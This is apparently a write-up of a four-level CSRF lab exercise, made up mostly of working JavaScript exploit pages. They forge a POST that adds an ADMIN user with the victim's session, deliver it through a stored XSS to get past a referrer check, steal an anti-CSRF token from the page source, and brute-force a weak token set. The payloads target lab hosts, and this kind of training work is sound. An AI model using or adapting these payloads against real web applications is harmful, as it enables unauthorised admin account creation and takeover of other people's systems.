CSRF

Level 1

In this warm up, create a page with the below code. A simulated user will visit the page.

<html>

<body bgcolor="#000000">
    <img src="hackerinside.jpg" />
</body>


<script type="text/javascript">
   var url =  "http://{LABID}.csrf.labs/add_user.php";
   var params =  "name=Malice&surname=Smith&email=malice23%40hacker.site&role=ADMIN&submit=";
   var CSRF = new XMLHttpRequest();
   CSRF.open("POST", url, true);
   CSRF.withCredentials = 'true'; //IMPORTANT MUST!!
   CSRF.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
   CSRF.send(params);
</script>

</html>

Level 2

In this level, there is a referrer header check, so adding the code to the hacker.site page will not work. Fortunately there is a stored XSS in the feedback form, so can use the above code to create the user.

Level 3

This time there is Anti-CSRF tokens in use.. But using its possible to extract the token from the source of the page and then send it with our request.

<script type="text/javascript">
function addUser(token) {
    var url = "http://3.csrf.labs/add_user.php";
    var param = "name=Malice&surname=Smith&email=malice%40hacker.site&role=ADMIN&submit=&CSRFToken=" + token; 
    var CSRF = new XMLHttpRequest();
    CSRF.open("POST",url,true);
    CSRF.withCredentials = 'true';
    CSRF.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    CSRF.send(param);
}
// Extract the token
var XHR = new XMLHttpRequest();
XHR.onreadystatechange = function() { 
    if (XHR.readyState == 4 ) {
        var htmlSource = XHR.responseText; // the source of users.php
        // Extract the token 
        var parser = new DOMParser().parseFromString(htmlSource, "text/html");
        var token = parser.getElementById('CSRFToken').value;
        addUser(token);
    }
}
XHR.open('GET', 'http://3.csrf.labs/users.php', true);
XHR.send();

Level 4

Analying the tokens using Burp sequencer, reveals that there is only 11 unique tokens in use.

Takes a list of CSRF tokens and then attempts to find the correct one by send the request with each token.

<html><body>
    <h1>Anti-CSRF Tokens to test</h1>
        <textarea id="tokens" rows="12" cols="60">
         1679091c5a880faf6fb5e6087eb1b2dc
      </textarea>			
        <script>
            function bruteLoop(TList) {
                for (var i = 0; i < TList.length; i++) {
                    console.info("Testing: " + TList[i]);
                    XHRPost(TList[i]);
                }
            }
            function XHRPost(tVal) {
                var http = new XMLHttpRequest();
                var url = "http://{LABID}.csrf.labs/add_user.php";
                var token = tVal;
                params = {
                    "name" : "Malice",
                    "surname" : "Smith",
                    "email" : "malice@hacker.site",
                    "role" : "ADMIN",
                    "submit" : "",
                    "CSRFToken" : token,
                };
                http.open("POST", url, true);
                http.withCredentials = 'true';
                //Send the proper header information along with the request
                http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                http.onreadystatechange = function() {
                    if (http.readyState > 1) {//We don't care about responses
                        //console.warn("Aborted " + token + " with status " + http.readyState);
                        http.abort();
                    }
                }
                //Serialize the data without using JQuery
                queryParams = Object.keys(params).reduce(function(a, k) {
                    a.push(k + '=' + encodeURIComponent(params[k]));
                    return a
                }, []).join('&');
                http.send(queryParams);
            }
            var tokens = document.getElementById('tokens').value.replace(/\s+/gm, '\n').split('\n');
            tokens = tokens.filter(Boolean);		// Remove empty lines
            // Brute Loop
            bruteLoop(tokens);
        </script>
    </body>
</html>